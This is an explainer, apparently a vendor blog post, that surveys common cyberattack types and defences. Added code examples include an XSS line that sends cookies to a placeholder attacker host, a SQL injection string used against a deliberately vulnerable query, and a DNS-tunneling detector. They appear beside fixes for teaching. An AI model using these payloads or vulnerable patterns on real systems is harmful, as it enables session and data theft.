A cyberattack is a deliberate attempt to access and assault computer systems, networks, or devices for malicious purposes. Like a biological virus, it only takes one tiny incursion to cause a lot of damage to many different parties in a very short time.
Taking advantage of technology and human vulnerabilities, cyberattacks are usually driven by a criminal or political agenda (or both). This can include economic gain, destruction, political espionage, or activism. The perpetrators can be individuals, organizations, or state actors acting directly or on behalf of third parties. Knowing the common types of cyberattacks and identifying any existing vulnerabilities are important first steps to planning your defenses against a potential cybersecurity threat.
What are the common types of cyberattacks?
1. Malware attacks
A malware attack uses malicious software to breach, disrupt, and/or damage a computer, computer system, server, or network. It can be used to steal or destroy data or prevent access to crucial parts of an organization’s computer network. A malware attack is a broad category that may also involve the following:
- Viruses: A virus is attached to a document or file and is dormant until the file is opened and in use. Once executed, the virus replicates itself, infecting other programs and spreading throughout the host computer system.
- Worms: Unlike viruses, worms don’t need to attach themselves to a host program or require human intervention to spread. They are often transmitted via email attachments or software vulnerabilities — multiplying and spreading rapidly.
- Trojan viruses: Like their namesake, trojan viruses rely on disguise. A trojan virus is malicious code that hides within seemingly helpful software programs. Trojan viruses don’t replicate themselves, but once downloaded they execute their intended tasks, like stealing data or establishing backdoor access to corporate systems.
- Spyware: Spyware is malicious software that secretly runs on a computer or network, collecting sensitive information, like financial or personal data, and sending it back to a remote user. Spyware can also be used to grant remote access to cybercriminals.
- Adware: Adware is malicious software unknowingly downloaded onto user devices that collects user activity data and uses it to serve up targeted advertisements. High volumes of adware can slow down your system, and some adware also contains trojan viruses and spyware.
- Fileless malware: Sneakier than regular malware, fileless malware leverages the software and applications in your operating system. Fileless malware is malicious code that’s hidden in a scripting language or injected into memory with a program like PowerShell, executing nefarious activities while the legitimate programs continue to run. Because fileless malware is memory-based, it is undetectable by antivirus software.
- Ransomware: Ransomware is malware that denies users access to their data and computer systems by encrypting files or locking hard drives until a ransom is paid. It’s an extortionist attack and one of the biggest cyber threats that businesses face today.
2. Double and triple extortion ransomware attacks
Conventional ransomware attacks usually involve one ransom amount in exchange for regaining access to data and/or systems that have been locked or encrypted. In a double-extortion ransomware attack, hackers demand two ransoms — one for a decryption key and one for the promise of not leaking confidential data. Triple-extortion ransomware attacks target third parties related to the primary victim, such as customers, business partners, and the media.
3. Phishing attacks
A phishing attack applies social engineering techniques through social media, email, and text messages to trick individuals into giving up sensitive data or confidential information. Victims could also be lured into downloading malware-infected files onto their devices. Phishing attacks include:
- Spear phishing or longlining: Spear phishing impersonates communications from a known or trusted individual, such as the CEO of an organization, or from a fabricated name with an authoritative title like Corporate Legal Administrator. The message is then sent to a targeted group of recipients.
- Whaling: Whaling is a phishing attack that targets senior executives of an organization, luring them to perform fraudulent activities.
- Pharming: Pharming uses malicious code installed on a user’s computer to direct that user to a fake website that is made to look legitimate, in order to steal or capture user data.
4. Man-in-the-middle (MITM) attacks
MITM attacks intercept communications or data exchange between two parties, usually a user and an application or network. The aim is to steal sensitive data like personal login details or manipulate them to carry out activities like illegal funds transfers.
An example is software-as-a-service (SaaS) applications, which are often hijacked to gain access to corporate networks and confidential data. Once the dastardly deed is done, attackers may reroute traffic to phishing websites or simply allow it to reach its intended destination. This makes MITM attacks hard to detect.
5. Denial-of-service (DoS) attacks
A DoS attack is a cyberattack designed to flood systems, servers, and/or networks with false traffic to overload resources and bandwidth, disrupting business operations. Users are prevented from performing legitimate tasks like accessing email or websites.
A distributed DoS or DDoS attack is launched from multiple systems, making it faster and harder to block. DDoS attacks fall into three categories:
- Application layer attacks target specific web applications instead of the network and aim to crash the web server. Examples include HTTP GET/POST floods, low and slow attacks, and Border Gateway Protocol or BGP hijacking.
- Protocol attacks target server and firewall resources. Examples include SYN floods and Ping of Death.
- Volume-based attacks target network bandwidth, unleashing a flood of traffic packets to saturate and overload the network.
6. Cross-site scripting (XSS)
In cross-site scripting attacks, malicious scripts or code are inserted into legitimate websites without the user’s knowledge, to be executed when the site is loaded. Once injected, malicious scripts can access sensitive information or even rewrite HTML page content. Websites that allow unvalidated user-generated content, such as web forums and message boards, are the most vulnerable to XSS attacks.
A typical XSS attack would look like this:
- When the user loads the website, the malicious code copies the user’s cookies.
- Next, it sends an HTTP request containing the stolen cookies to the attacker’s web server.
- Using the stolen cookies, the attacker then impersonates the user or accesses the user’s personal data for fraudulent purposes.
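The forum scenario above, as an added example that is not part of the original article: a minimal comment renderer that echoes user content as-is (the vulnerable form), the same renderer with HTML escaping, and the HttpOnly cookie attribute that stops step 1 of the attack (a script reading the user's cookies) even when an injection gets through. The comment text and the attacker host are constructed placeholders.

```python
import html

# Constructed sample of forum input carrying the cookie-stealing script the
# text describes; attacker.example is a placeholder, not a real host.
INJECTED_COMMENT = (
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
)

def render_comment_unsafe(comment: str) -> str:
    """Echoes user content straight into the page: the script tag survives
    and runs in every visitor's browser when the site loads."""
    return f"<p>{comment}</p>"

def render_comment_safe(comment: str) -> str:
    """HTML-escapes the content so the browser shows it as text, not markup."""
    return f"<p>{html.escape(comment, quote=True)}</p>"

def session_cookie_header(session_id: str) -> str:
    """HttpOnly keeps document.cookie from exposing the session cookie to
    scripts, so copying the cookie fails even if an injection slips through;
    Secure and SameSite limit where the browser will send it."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"

def contains_script_tag(rendered: str) -> bool:
    """A crude output check a test can run over rendered pages."""
    return "<script" in rendered.lower()

if __name__ == "__main__":
    print(render_comment_unsafe(INJECTED_COMMENT))
    print(render_comment_safe(INJECTED_COMMENT))
    print(session_cookie_header("example-session-id"))
```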
7. SQL injections
Like XSS attacks, SQL injections inject malicious Structured Query Language (SQL) code into data-driven applications to access sensitive information. The key difference is that XSS attacks target other users of the same application, while SQL injections target the application’s database.
Leveraging system vulnerabilities, hackers use SQL injections to manipulate backend databases or servers for access to confidential data such as customer lists. They may then steal, modify, or delete that data as part of their diabolical mission. SQL injections are reportedly among the most common types of cyberattacks on gamers and the gaming industry.
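The customer-list scenario above, as an added example that is not part of the original article: a lookup that builds its SQL by string formatting, which lets a crafted input widen the query to the whole customer table, beside the parameterized version that treats the same input as a plain value. The in-memory SQLite table and its rows are constructed sample data.

```python
import sqlite3

def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a real customer table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (name TEXT, email TEXT, region TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", [
        ("Ada", "ada@example.com", "north"),
        ("Bo", "bo@example.com", "south"),
        ("Cy", "cy@example.com", "south"),
    ])
    return conn

def customers_in_region_vulnerable(conn: sqlite3.Connection, region: str):
    """Vulnerable: user input is pasted into the SQL text, so quotes in the
    input change the query instead of being matched as data."""
    query = f"SELECT name, email FROM customers WHERE region = '{region}'"
    return conn.execute(query).fetchall()

def customers_in_region_safe(conn: sqlite3.Connection, region: str):
    """Hardened: the driver binds the value separately from the SQL text,
    so the same input is compared literally and matches nothing."""
    return conn.execute(
        "SELECT name, email FROM customers WHERE region = ?", (region,)
    ).fetchall()

# Constructed input that turns the WHERE clause into an always-true test.
INJECTED_REGION = "' OR '1'='1"

if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable:", customers_in_region_vulnerable(db, INJECTED_REGION))
    print("safe:      ", customers_in_region_safe(db, INJECTED_REGION))
```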
8. DNS tunneling
DNS tunneling attacks abuse the DNS query and response protocol, bypassing traditional security measures like firewalls to penetrate and infect the server or network. Command-and-control messages or small amounts of data are incrementally encoded into DNS queries and responses, creating a covert back channel that gives unfettered access to the target system. Hackers are then free to extract data or deliver additional malware payloads.
Suspicious DNS traffic is difficult to detect because it hides among large volumes of legitimate DNS queries, but there are two ways to do so:
- Payload analysis focuses on the information received by the DNS server. Anything unusual like odd hostnames may be a sign of foul play.
- Traffic analysis looks at the volume of DNS domain requests compared to a normal DNS exchange. Any sudden spikes may indicate malicious activity.
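Both detection approaches above, as an added example that is not part of the original article: payload analysis scores the leftmost label of each queried name for length and character entropy, and traffic analysis counts queries per client and parent domain against a baseline. The log lines are constructed, the parent domain is assumed to be the last two labels, and the thresholds are illustrative.

```python
import math
from collections import defaultdict

# Constructed DNS query log (time, client IP, queried name); not real traffic.
DNS_LOG = """\
10:00:01 10.0.0.5 www.example.com
10:00:02 10.0.0.5 mail.example.com
10:00:03 10.0.0.5 cdn.example.com
10:00:03 10.0.0.7 4f1a9c0e7b2d8a6f3e5c1b9d0a7e2f4c.t.example.net
10:00:03 10.0.0.7 9b2d4f6a8c0e1f3b5d7a9c2e4f6b8d0a.t.example.net
10:00:04 10.0.0.7 c3e5a7f9b1d2c4e6f8a0b2d4e6f8a1c3.t.example.net
10:00:04 10.0.0.7 1d3f5b7a9c2e4f6b8d0a1c3e5f7b9d2e.t.example.net
10:00:05 10.0.0.7 e7f9a1c3b5d2e4f6a8c0b2d4f6e8a1c3.t.example.net
10:00:05 10.0.0.7 5a7c9e1f3b2d4f6a8c0e1b3d5f7a9c2e.t.example.net
"""

def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; encoded data scores high, words low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def suspicious_name(qname: str, max_label: int = 24, max_entropy: float = 3.5) -> bool:
    """Payload analysis: tunnels carry their data in the leftmost label."""
    label = qname.split(".")[0]
    return len(label) >= max_label or shannon_entropy(label) >= max_entropy

def parse_log(text: str):
    return [tuple(line.split()) for line in text.splitlines() if line.strip()]

def flag_names(records):
    return {qname for _, _, qname in records if suspicious_name(qname)}

def flag_clients(records, max_per_domain: int = 5):
    """Traffic analysis: queries per client and parent domain (assumed to be
    the last two labels); clients above the baseline are flagged."""
    per_client_domain = defaultdict(int)
    for _, client, qname in records:
        parent = ".".join(qname.split(".")[-2:])
        per_client_domain[(client, parent)] += 1
    return {c for (c, _), n in per_client_domain.items() if n > max_per_domain}

if __name__ == "__main__":
    recs = parse_log(DNS_LOG)
    print("suspicious names:", sorted(flag_names(recs)))
    print("suspicious clients:", sorted(flag_clients(recs)))
```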
9. Password attack
A password attack refers to any attempt to steal a user’s password, using it to obtain access to confidential data and systems for further exploitation. Password attacks can come in many forms — phishing, malware, or a classic brute-force attack where hackers use a program to submit all possible password combinations and variants to try and crack a password. Many users struggle with creating strong passwords, making password attacks an attractive choice for cybercriminals. For companies, a leaked password or compromised credentials in the wrong hands can have severe consequences, as seen in the Colonial Pipeline incident.
10. Internet of Things (IoT) attacks
In an IoT environment, multiple different devices are connected to a network where real-time data is collected and analyzed for actionable insights. In IoT attacks, attackers can simply target one point of entry to gain access to the other connected devices on the network. Examples of common IoT cyberattacks are IoT botnets, DDoS attacks, DNS poisoning, ransomware, and data breaches.
The scale and complexity of IoT architecture result in higher levels of cybersecurity risk and vulnerabilities yet 43% of businesses don’t protect their full IoT suite. Challenges include hardware diversity, a lack of integrated security, difficulties in patching and updates, insecure protocols, and device mismanagement or misconfiguration.
11. Zero-day exploits
Zero-day exploits target a software or system vulnerability before the developer can patch or fix it. Vulnerabilities can take any form and can be exploited as long as they exist. In this scenario, there is a small window of time where there’s a security gap with no existing solution, presenting a golden opportunity for hackers to launch a cyberattack.
What are the impacts of cyberattacks on businesses?
Cyberattacks can be multipronged and involve more than one type of attack. The impact of an attack depends on the severity of the cyber threat and the security and resilience of the target organization. With every kind of cyberattack, there are tangible and intangible consequences.
An organization that has been hit by ransomware may pay the ransom to regain access to its data and systems, or to prevent hackers from releasing confidential information to the public. If important data has been leaked, resulting in litigation and public relations crises, companies may be forced to hire lawyers and other experts to handle the aftermath. Preventing future attacks would also likely require additional funds to shore up the necessary technology and expertise.
One of the primary objectives of cyberattacks is to cause as much disruption in the shortest time possible. An organization with its systems infected, firewalls breached, and data encrypted and rendered inaccessible, is unable to function. In such situations, the lost revenue can be significant and snowball quickly.
Damage to reputation and customer relationships
Reputational damage may be hard to quantify, but it is also hard to repair and can have long-term implications that organizations may or may not fully recover from. With the loss of trust and credibility, customers and partners may take their business elsewhere rather than risk a poor recovery or a repeat incident.
Loss of intellectual property
The theft of intellectual property like product designs and patents, proprietary research or technology, and business strategies often results in losses that cannot be recovered. Stolen intellectual property may fall into the hands of competitors or unethical third parties, who may use it for their own gain, resulting in the loss of revenue and competitive advantage.
How do you defend your organization against cyberattacks?
Build a strong security foundation
Organizations can enhance their cybersecurity hygiene by actively building a strong security-minded culture. Ensuring that employees understand the importance of IT security and the role that they play can help reduce human vulnerabilities, making it much harder for cyberattacks to succeed.
Cultivate and empower your cybersecurity experts
Enhance the skills and knowledge of software development and DevOps teams, so that they’re prepared and know how to prevent different types of cyberattacks. Adopt best practices in application security and work with the team to develop a clear course of action in the event of a cyberattack.
Secure your endpoint environment
Many cyberattack victims agree that their data breach could have been prevented with an available patch. An endpoint management solution like SmartDeploy allows you to efficiently manage and patch software installed on user endpoints, keeping them up to date and secure. Also, back up all important data and invest in antimalware programs and antivirus software to stay ahead of potential cyber threats.
For more good stuff, watch our guided demo and learn how SmartDeploy can be easily used to deploy applications and patches, drivers, and Windows images in independent layers. And it doesn’t matter if your environment is onsite, remote, or a hybrid mix of both because SmartDeploy allows you to deploy in all three scenarios. Download a free trial and give it a try for yourself!